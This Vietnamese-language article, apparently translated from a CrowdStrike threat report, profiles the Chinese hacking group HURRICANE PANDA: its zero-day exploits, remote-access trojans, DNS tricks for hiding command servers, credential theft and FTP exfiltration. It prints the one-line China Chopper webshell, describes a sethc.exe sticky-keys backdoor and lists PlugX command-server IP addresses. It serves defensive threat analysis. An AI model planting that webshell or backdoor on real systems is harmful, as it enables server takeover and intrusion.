Chủ đề

(Quốc tế) - HURRICANE PANDA là một nhóm tin tặc có tay nghề cao của Trung Quốc, chuyên nhắm mục tiêu vào các hãng cung cấp dịch vụ Internet, kỹ thuật và hàng không. Từ tháng 02/2014, CrowdStrike Intelligence đã quan sát thấy HURRICANE PANDA sử dụng ít nhất 2 bộ công cụ khai thác lỗ hổng zero-day, một kỹ thuật phân giải DNS độc đáo và các công cụ thường được sử dụng bởi các tin tặc Trung Quốc.

HURRICANE PANDA (kỳ 2)

tinh-hinh-bien-dong-moi-nhat-hom-nay-ngay-22-7-2

Mục lục
[ẩn]

HURRICANE PANDA là một nhóm tin tặc có tay nghề cao của Trung Quốc, chuyên nhắm mục tiêu vào các hãng cung cấp dịch vụ Internet, kỹ thuật và hàng không. Từ
tháng 02/2014, CrowdStrike Intelligence đã quan sát thấy HURRICANE PANDA sử
dụng ít nhất 2 bộ công cụ khai thác lỗ hổng zero-day, một kỹ thuật phân giải DNS độc
đáo và các công cụ thường được sử dụng bởi các tin tặc Trung Quốc. Khi xâm nhập
vào hệ thống mạng của nạn nhân, nhóm tin tặc này sẽ tìm cách đoạt các thông tin đăng
nhập hợp pháp để có thể di chuyển và thiết lập các phiên RDP để đạt được mục tiêu.
Dựa trên các khả năng kỹ thuật của chúng, HURRICANE PANDA hiện nhà nhóm tin tặc
tiên tiến nhất của Trung Quốc mà CrowdStrike đã quan sát được.

Lỗ hổng zero-day, Các bộ công cụ khai thác và Các lỗ hổng Web

Như đã trình bày ở trên, CrowdStrike Intelligence đã quan sát thấy HURRICANE
PANDA sử dụng 2 bộ công cụ khai thác lỗ hổng zero-day, cho thấy nhóm này có khả
năng trên trung bình hoặc đã tiếp cận với những kẻ phát triển công cụ khai thác. Thứ
nhất, vào tháng 02/2014, nhóm tin tặc này đã bị quan sát thấy sử dụng thủ thuật SWC
để xâm nhập vào các hệ thống mạng của nạn nhân thông qua lỗ hổng CVE- 2014-0322.
Việc khai thác thành công trong chiến dịch này đã khiến nạn nhân bị cài đặt mã độc

Sakula. Nhiều hoạt động nhắm mục tiêu trong chiến dịch này dường như là nhằm vào
khu vực hàng không vũ trụ Pháp 14 .

Vào tháng 10/2014, HURRICANE PANDA đã sử dụng lổ hổng CVE-2014-4113 để tăng
đặc quyền trên các máy Windows 64-bit đã bị tấn công 15 . Việc khai thác lỗ hổng này
đánh dấu lần đầu tiên nó được quan sát thấy.

Bên cạnh các bộ công cụ khai thác lỗ hổng zero-day, HURRICANE PANDA còn sử dụng 3 bộ công cụ tăng đặc quyền khác và một công cụ khai thác thực thi mã từ xa.

Cuối cùng, trong một trường hợp khác, HURRICANE PANDA đã đoạt được quyền truy
cập ban đầu vào hệ thống của một nạn nhân thông qua một lỗ hổng tiêm SQL. Sau đó,
chúng đã sử dụng lỗ hổng này để đăng một đoạn mã webshell Chopper đơn giản để
đoạt quyền truy cập thêm, di chuyển vào hệ thống mạng doanh nghiệp và cài đặt thêm
các RAT.

Gói Rat

HURRICANE PANDA sử dụng một số công cụ điều khiển từ xa (RAT). Trong năm qua,
CrowdStrike Intelligence đã quan sát thấy nhóm tin tặc này triển khai Sakula, Gh0st
RAT, PlugX và HiKit. Trong khi Gh0st đã được sử dụng rộng rãi trong nhiều năm thì các
RAT khác lại chỉ liên quan đến các tin tặc Trung Quốc.

Những tin tặc này cũng thưởng sử dụng webshell Chopper; công cụ này mang lại cho
chúng chức năng tương đương với RAT để có thể kiểm soát máy chủ web. Chopper có
thể tồn tại ở một dạng khá đơn giản:

eval($_POST[“chopper”]);

với “chopper” là một mật khẩu được lựa chọn bởi kẻ tấn công. Đoạn mã một dòng đơn
giản này mang lại cho tin tặc quyền truy cập vào máy chủ web để từ đó chúng có thể
triển khai các công cụ nâng đặc quyền, di chuyển hoặc triển khai các đoạn mã phức tạp
hơn để tương tác với các cơ sở dữ liệu trên máy chủ web.

Mặc dù việc sử dụng PlugX đã tăng lên đáng kể trong năm qua trong cộng đồng tin tặc
Trung Quốc, việc sử dụng công cụ này của HURRICANE PANDA lại đáng chú ý vì 2 lý
do. Thứ nhất, khi cấu hình PlugX, kẻ tấn công đã được cung cấp lựa chọn sử dụng lên đến 4 máy chủ DNS tùy chọn. Biết được điều này, HURRICANE PANDA đã phát hiện
một dịch vụ độc đáo được cung cấp bởi nhà cung cấp dịch vụ Internet tại California –
Hurricane Electric. Bằng cách sử dụng dịch vụ DNS miễn phí của Hurricane Electric,
các tin tặc đã có thể phân giải các tên miền phổ biến như www.pinterest.com, adobe.
com và github.com. Việc sử dụng các tên miền hợp pháp có thể đánh lừa những người
ứng phó sự cố, làm cho họ tin rằng các liên lạc này là vô hại.

HURRICANE PANDA đã tận dụng tính năng DNS tùy chỉnh của PlugX để sử dụng các
dịch vụ lưu trữ DNS miễn phí được cung cấp bởi Hurricane Electric để phân giải các
tên miền đến máy chủ C2 của PlugX thay vì các địa chỉ IP thật của chúng. Hurricane
Electric đã nhanh chóng hành động để ngăn chặn hành vi cho phép DNS phân giải các
tên miền hợp pháp.

GLOMột phương pháp phân giải C2 độc đáo được HURRICANE PANDA áp dụng là sử dụng
Google Code làm máy chủ cho một chuỗi được mã hóa có chứa nút C2 thật của PlugX
như dưới đây.

GLO_final_3

Mặc dù phương pháp phân phối máy chủ C2 này đã có trong PlugX ít nhất từ năm
2012, việc sử dụng nó lại không phổ biến. Trong trường hợp này, mã độc PlugX sẽ
yêu cầu một trong những dự án Google Code, tìm kiếm vị trí cho chuỗi định giới với
“DZKS” và “DZJS” và giải mã chuỗi này. Chuỗi được giải mã có chứa giao thức để giao
tiếp cũng như các cặp địa chỉ IP và cổng. Khi các chuỗi trên được giải mã, các địa chỉ IP sau sẽ được sử dụng làm máy chủ C2 của PlugX:

•     223.29.248.9
•     202.181.133.237
•     61.78.34.179
•     203.135.134.243

Hậu khai thác và trích xuất

Sau khi HURRICANE PANDA xâm nhập vào hệ thống mạng của một nạn nhân, chúng
sẽ tìm kiếm các thông tin đăng nhập hợp pháp thông qua các công cụ như Windows
Credential Viewer, Windows Credential Editor hay Mimikatz. Một khi đã có được thông
tin đăng nhập, tin tặc sẽ sử dụng chúng để truy cập vào hệ thống thay vì tương tác với
RAT của chúng nhằm làm giảm dấu vết và cho phép chúng xuất hiện như những người
dùng VPN hợp pháp.

Nếu không thể có được thông tin đăng nhập, HURRICANE PANDA thường sẽ dựa trên
RDP (Giao thức làm việc từ xa). Đầu tiên, chúng sẽ thay các tập tin chứa các khóa đính
kèm (sử dụng sethc.exe 16 ) với một bản cmd.exe phiên bản Trung Quốc của chúng trên máy tính nạn nhân. Sau đó, chúng sẽ truy cập vào máy tính của nạn nhân qua RDP và, khi được hiển thị màn hình đăng nhập, nó sẽ kích hoạt cơ chế phím đính kèm và được hiển thị một shell lệnh quản trị. Bên cạnh đó, PlugX có khả năng truyền liên mạng RDP ngược mà HURRICANE PANDA đã triển khai.

Hoạt động trích xuất của HURRICANE PANDA đi theo một mô hình đơn giản thường
được thực hiện bởi các tin tặc Trung Quốc. Đầu tiên, các tập tin được quan tâm được
nén và bảo vệ bằng mật khẩu bằng cách sử dụng RAR. Tiếp đó, chúng đặt các tập tin
tại một vị trí thuận tiện. Cuối cùng, chúng trích xuất các tập tin này từ hệ thống thông
qua FTP.

Liên kết có thể có với AURORA PANDA

CrowdStrike Intelligence hiện đang đánh giá các liên kết có thể có giữa HURRICANE
PANDA và AURORA PANDA. Hiện vẫn chưa có liên kết rõ ràng nào nhưng có những
dấu hiệu tấn công liên quan đến AURORA PANDA đã được phát hiện trên các hệ thống
mạng bị tấn công bởi HURRICANE PANDA. Các liên kết khác bao gồm: các bộ công cụ
tương tự, quyền truy cập vào các công cụ khai thác lỗ hổng zero-day và các liên kết cơ
sở hạ tầng có thể có.

HURRICANE PANDA là một trong những nhóm tin tặc có năng lực nhất của Trung
Quốc và vấn đề với băng nhóm này cần được hết sức quan tâm.

(Còn tiếp)

Ban biên tập

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hiểu biết về kẻ thù (10)

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hiểu biết về kẻ thù (10)

Hiểu về kẻ thù để có thể bảo vệ hệ thống mạng hiệu quả hơn. Phát hiện, ngăn chặn và phòng vệ trước những kẻ tấn công tinh vi nhất hiện nay.           Tác động của...

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hoạt động đáng chú ý (Kỳ 9)

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hoạt động đáng chú ý (Kỳ 9)

Lỗ hổng chưa từng được biết đến này trong trình duyệt Internet Explorer, cho phép thực thi mã thông qua mã JavaScript đặc biệt, khiến nó trở thành một công cụ lý tưởng cho các...

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hoạt động đáng chú ý (Kỳ 8)

(CĐ 19) Các nhóm tin tặc Trung Quốc: Goblin Panda – Hoạt động đáng chú ý (Kỳ 8)

Sự xuất hiện của một số lỗ hổng chưa từng được biết đến trước đó (lỗ hổng zero day) thường là một sự xuất hiện bất thường. Những sự kiện này khi mới đầu phát...

Bài viết, video, hình ảnh đóng góp cho chuyên mục vui lòng gửi về banbientap@nguyentandung.org
Thích và chia sẻ bài này trên